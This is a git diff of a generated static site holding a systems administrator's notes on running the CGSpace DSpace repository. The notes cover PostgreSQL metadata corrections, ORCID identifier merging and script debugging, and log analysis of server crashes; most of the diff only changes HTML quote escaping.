@ -434,9 +433,9 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
(8 rows)
dspace=# begin;
dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
dspace=# update metadatavalue set text_value=&#39;Duncan, Alan&#39;, authority=&#39;a6486522-b08a-4f7a-84f9-3a73ce56034d&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Duncan, Alan%&#39;;
UPDATE 216
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d | 600
@ -464,7 +463,7 @@ dspace=# commit;
<li>I see that in <a href="/cgspace-notes/2017-04/">April, 2017</a> I just used a SQL query to get a user&rsquo;s submissions by checking the <code>dc.description.provenance</code> field</li>
<li>So for Abenet, I can check her submissions in December, 2017 with:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*yabowork.*2017-12.*&#39;;
</code></pre><ul>
<li>I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it</li>
<li>This would be using <a href="https://www.linode.com/blockstorage">Linode&rsquo;s new block storage volumes</a></li>
@ -484,7 +483,7 @@ Caused by: java.net.SocketException: Socket closed
</code></pre><ul>
<li>Could be because of the <code>removeAbandoned=&quot;true&quot;</code> that I enabled in the JDBC connection pool last week?</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;java.net.SocketException: Socket closed&quot; dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#34;java.net.SocketException: Socket closed&#34; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -535,27 +534,27 @@ $ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
<li>Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+</li>
<li>Peter combined it with mine and we have 1204 unique ORCIDs!</li>
</ul>
<pre tabindex="0"><code>$ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
<pre tabindex="0"><code>$ grep -coE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv
1204
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
1204
</code></pre><ul>
<li>Also, save that regex for the future because it will be very useful!</li>
<li>CIAT sent a list of their authors' ORCIDs and combined with ours there are now 1227:</li>
<li>CIAT sent a list of their authors&rsquo; ORCIDs and combined with ours there are now 1227:</li>
</ul>
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1227
</code></pre><ul>
<li>There are some formatting issues with names in Peter&rsquo;s list, so I should remember to re-generate the list of names from ORCID&rsquo;s API once we&rsquo;re done</li>
<li>The <code>dspace cleanup -v</code> currently fails on CGSpace with the following:</li>
</ul>
<pre tabindex="0"><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(149473) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(149473) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to update the bitstream table, as I&rsquo;ve discovered several other times in 2016 and 2017:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);&#39;
UPDATE 1
</code></pre><ul>
<li>Then the cleanup process will continue for awhile and hit another foreign key conflict, and eventually it will complete after you manually resolve them all</li>
@ -575,25 +574,25 @@ UPDATE 1
<li>I only looked quickly in the logs but saw a bunch of database errors</li>
<li>PostgreSQL connections are currently:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | uniq -c
2 dspaceApi
1 dspaceWeb
3 dspaceApi
</code></pre><ul>
<li>I see shitloads of memory errors in Tomcat&rsquo;s logs:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Java heap space&quot; /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#34;Java heap space&#34; /var/log/tomcat7/catalina.out
56
</code></pre><ul>
<li>And shit tons of database connections abandoned:</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
612
</code></pre><ul>
<li>I have no fucking idea why it crashed</li>
<li>The XMLUI activity looks like:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;15/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;15/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
715 63.143.42.244
746 213.55.99.121
886 68.180.228.157
@ -610,7 +609,7 @@ UPDATE 1
<li>I made a pull request to fix it ((#354)[https://github.com/ilri/DSpace/pull/354])</li>
<li>I should remember to update existing values in PostgreSQL too:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 2
</code></pre><h2 id="2018-02-18">2018-02-18</h2>
<ul>
@ -646,13 +645,13 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
168571
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | wc -l
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | wc -l
8188
</code></pre><ul>
<li>Only 8,000 requests during those four hours, out of 170,000 the whole day!</li>
<li>And the usage of XMLUI, REST, and OAI looks SUPER boring:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
111 95.108.181.88
158 45.5.184.221
201 104.196.152.243
@ -677,7 +676,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<ul>
<li>Combined list of CGIAR author ORCID iDs is up to 1,500:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1571
</code></pre><ul>
<li>I updated my <code>resolve-orcids-from-solr.py</code> script to be able to resolve ORCID identifiers from a text file so I renamed it to <code>resolve-orcids.py</code></li>
@ -692,13 +691,13 @@ Ahmad Maryudi: 0000-0001-5051-7217
</ul>
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 111, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 111, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
family_name = data['name']['family-name']['value']
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
family_name = data[&#39;name&#39;][&#39;family-name&#39;][&#39;value&#39;]
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s family-name is null so that sucks</li>
<li>I fixed the script so that it checks if the family name is null</li>
@ -706,13 +705,13 @@ TypeError: 'NoneType' object is not subscriptable
</ul>
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 117, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 117, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
if data['name']['given-names']:
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
if data[&#39;name&#39;][&#39;given-names&#39;]:
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s entire name block is null!</li>
</ul>
@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
<li>Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we&rsquo;ll now only use ORCID iDs that have been sent to use from partners, not those extracted via keyword searches on orcid.org</li>
<li>This should be the version we use (the existing controlled vocabulary generated from CGSpace&rsquo;s Solr authority core plus the IDs sent to us so far by partners):</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; 2018-02-20-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; 2018-02-20-combined.txt
</code></pre><ul>
<li>I updated the <code>resolve-orcids.py</code> to use the &ldquo;credit-name&rdquo; if it exists in a profile, falling back to &ldquo;given-names&rdquo; + &ldquo;family-name&rdquo;</li>
<li>Also, I added color coded output to the debug messages and added a &ldquo;quiet&rdquo; mode that supresses the normal behavior of printing results to the screen</li>
<li>I&rsquo;m using this as the test input for <code>resolve-orcids.py</code>:</li>
</ul>
<pre tabindex="0"><code>$ cat orcid-test-values.txt
# valid identifier with 'given-names' and 'family-name'
# valid identifier with &#39;given-names&#39; and &#39;family-name&#39;
0000-0001-5019-1368
# duplicate identifier
@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
# invalid identifier
0000-0001-9634-19580
# has a 'credit-name' value we should prefer
# has a &#39;credit-name&#39; value we should prefer
0000-0002-1735-7458
# has a blank 'credit-name' value
# has a blank &#39;credit-name&#39; value
0000-0001-5199-5528
# has a null 'name' object
# has a null &#39;name&#39; object
0000-0002-1300-3636
# has a null 'family-name' value
# has a null &#39;family-name&#39; value
0000-0001-9634-1958
# missing ORCID identifier
@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
<li>It looks like Sisay restarted Tomcat because I was offline</li>
<li>There was absolutely nothing interesting going on at 13:00 on the server, WTF?</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &quot;22/Feb/2018:13&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &#34;22/Feb/2018:13&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
55 192.99.39.235
60 207.46.13.26
62 40.77.167.38
@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>Otherwise there was pretty normal traffic the rest of the day:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
839 216.244.66.245
1074 68.180.228.117
1114 157.55.39.100
@ -798,9 +797,9 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>So I don&rsquo;t see any definite cause for this crash, I see a shit ton of abandoned PostgreSQL connections today around 1PM!</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
729
# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
# grep &#39;Feb 22, 2018 1&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
519
</code></pre><ul>
<li>I think the <code>removeAbandonedTimeout</code> might still be too low (I increased it from 60 to 90 seconds last week)</li>
@ -820,12 +819,12 @@ TypeError: 'NoneType' object is not subscriptable
<li>A few days ago Abenet sent me the list of ORCID iDs from CCAFS</li>
<li>We currently have 988 unique identifiers:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
988
</code></pre><ul>
<li>After adding the ones from CCAFS we now have 1004:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1004
</code></pre><ul>
<li>I will add them to DSpace Test but Abenet says she&rsquo;s still waiting to set us ILRI&rsquo;s list</li>
@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>The query in Solr would simply be <code>orcid_id:*</code></li>
<li>Assuming I know that authority record with <code>id:d7ef744b-bbd4-4171-b449-00e37e1b776f</code>, then I could query PostgreSQL for all metadata records using that authority:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority=&#39;d7ef744b-bbd4-4171-b449-00e37e1b776f&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
2726830 | 77710 | 3 | Rodríguez Chalarca, Jairo | | 2 | d7ef744b-bbd4-4171-b449-00e37e1b776f | 600 | 2
@ -896,18 +895,18 @@ Nor Azwadi: 0000-0001-9634-1958
<li>I need to see which SQL queries are run during that time</li>
<li>And only a few hours after I disabled the <code>removeAbandoned</code> thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
279 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
218
</code></pre><ul>
<li>So I&rsquo;m re-enabling the <code>removeAbandoned</code> setting</li>
<li>I grabbed a snapshot of the active connections in <code>pg_stat_activity</code> for all queries running longer than 2 minutes:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &quot;runtime&quot;, application_name, usename, datname, waiting, state, query
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &#34;runtime&#34;, application_name, usename, datname, waiting, state, query
FROM pg_stat_activity
WHERE now() - query_start &gt; '2 minutes'::interval
WHERE now() - query_start &gt; &#39;2 minutes&#39;::interval
ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
COPY 263
</code></pre><ul>
@ -936,7 +935,7 @@ COPY 263
<li>CGSpace crashed today, the first HTTP 499 in nginx&rsquo;s access.log was around 09:12</li>
<li>There&rsquo;s nothing interesting going on in nginx&rsquo;s logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Feb/2018:09:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Feb/2018:09:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
65 197.210.168.174
74 213.55.99.121
74 66.249.66.90
@ -955,7 +954,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
</code></pre><ul>
<li>Memory issues seem to be common this month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#39;nested exception is java.lang.OutOfMemoryError: Java heap space&#39; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
</code></pre><ul>
<li>Top ten users by session during the first twenty minutes of 9AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code>$ grep -E &#39;2018-02-28 09:(0|1)&#39; dspace.log.2018-02-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq -c | sort -n | tail -n 10
18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
@ -1006,7 +1005,7 @@ dspace.log.2018-02-28:1
<li>I think I&rsquo;ll increase the JVM heap size on CGSpace from 6144m to 8192m because I&rsquo;m sick of this random crashing shit and the server has memory and I&rsquo;d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work</li>
<li>Run the few corrections from earlier this month for sponsor on CGSpace:</li>
</ul>
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 3
</code></pre><ul>
<li>I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)</li>

View File

@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
Export a CSV of the IITA community metadata for Martin Mueller
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
<li>There were some records using a non-breaking space in their AGROVOC subject field</li>
<li>I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p 'fuuu' -f dc.contributor.author -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p &#39;fuuu&#39; -f dc.contributor.author -m 3
</code></pre><ul>
<li>This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character</li>
<li>Add new CRP subject &ldquo;GRAIN LEGUMES AND DRYLAND CEREALS&rdquo; to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/358">#358</a>)</li>
@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
<li>Run all system updates on DSpace Test and reboot server</li>
<li>I ran the <a href="https://gist.github.com/alanorth/24d8081a5dc25e2a4e27e548e7e2389c">orcid-authority-to-item.py</a> script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata</li>
</ul>
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p &#39;fuuu&#39; -s http://localhost:8081/solr -d
</code></pre><ul>
<li>I ran the DSpace cleanup script on CGSpace and it threw an error (as always):</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(150659) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(150659) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);&#39;
UPDATE 1
</code></pre><ul>
<li>Apply the proposed PostgreSQL indexes from DS-3636 (pull request <a href="https://github.com/DSpace/DSpace/pull/1791/">#1791</a> on CGSpace (linode18)</li>
@ -180,7 +180,7 @@ UPDATE 1
es
(16 rows)
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;en&#39;,&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 122227
dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
<li>On second inspection it looks like <code>dc.description.provenance</code> fields use the text_lang &ldquo;en&rdquo; so that&rsquo;s probably why there are over 100,000 fields changed&hellip;</li>
<li>If I skip that, there are about 2,000, which seems more reasonably like the amount of fields users have edited manually, or fucked up during CSV import, etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 2309
</code></pre><ul>
<li>I will apply this on CGSpace right now</li>
@ -207,11 +207,11 @@ UPDATE 2309
<li>Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the <code>cg.creator.id</code> field</li>
<li>For example, a GREL expression in a custom text facet to get all items with <code>dc.contributor.author[en_US]</code> of a certain author with several name variations (this is how you use a logical OR in OpenRefine):</li>
</ul>
<pre tabindex="0"><code>or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
<pre tabindex="0"><code>or(value.contains(&#39;Ceballos, Hern&#39;), value.contains(&#39;Hernández Ceballos&#39;))
</code></pre><ul>
<li>Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:</li>
</ul>
<pre tabindex="0"><code>if(isBlank(value), &quot;Hernan Ceballos: 0000-0002-8744-7918&quot;, value + &quot;||Hernan Ceballos: 0000-0002-8744-7918&quot;)
<pre tabindex="0"><code>if(isBlank(value), &#34;Hernan Ceballos: 0000-0002-8744-7918&#34;, value + &#34;||Hernan Ceballos: 0000-0002-8744-7918&#34;)
</code></pre><ul>
<li>One thing that bothers me is that this won&rsquo;t honor author order</li>
<li>It might be better to do batches of these in PostgreSQL with a script that takes the <code>place</code> column of an author into account when setting the <code>cg.creator.id</code></li>
@ -219,8 +219,8 @@ UPDATE 2309
<li>The CSV should have two columns: author name and ORCID identifier:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Orth, Alan&quot;,Alan S. Orth: 0000-0002-1735-7458
&quot;Orth, A.&quot;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, Alan&#34;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, A.&#34;,Alan S. Orth: 0000-0002-1735-7458
</code></pre><ul>
<li>I didn&rsquo;t integrate the ORCID API lookup for author names in this script for now because I was only interested in &ldquo;tagging&rdquo; old items for a few given authors</li>
<li>I added ORCID identifers for 187 items by CIAT&rsquo;s Hernan Ceballos, because that is what Elizabeth was trying to do manually!</li>
@ -240,10 +240,10 @@ UPDATE 2309
g/jspui/listings-and-reports
-- Method: POST
-- Parameters were:
-- selected_admin_preset: &quot;ilri authors2&quot;
-- load: &quot;normal&quot;
-- next: &quot;NEXT STEP &gt;&gt;&quot;
-- step: &quot;1&quot;
-- selected_admin_preset: &#34;ilri authors2&#34;
-- load: &#34;normal&#34;
-- next: &#34;NEXT STEP &gt;&gt;&#34;
-- step: &#34;1&#34;
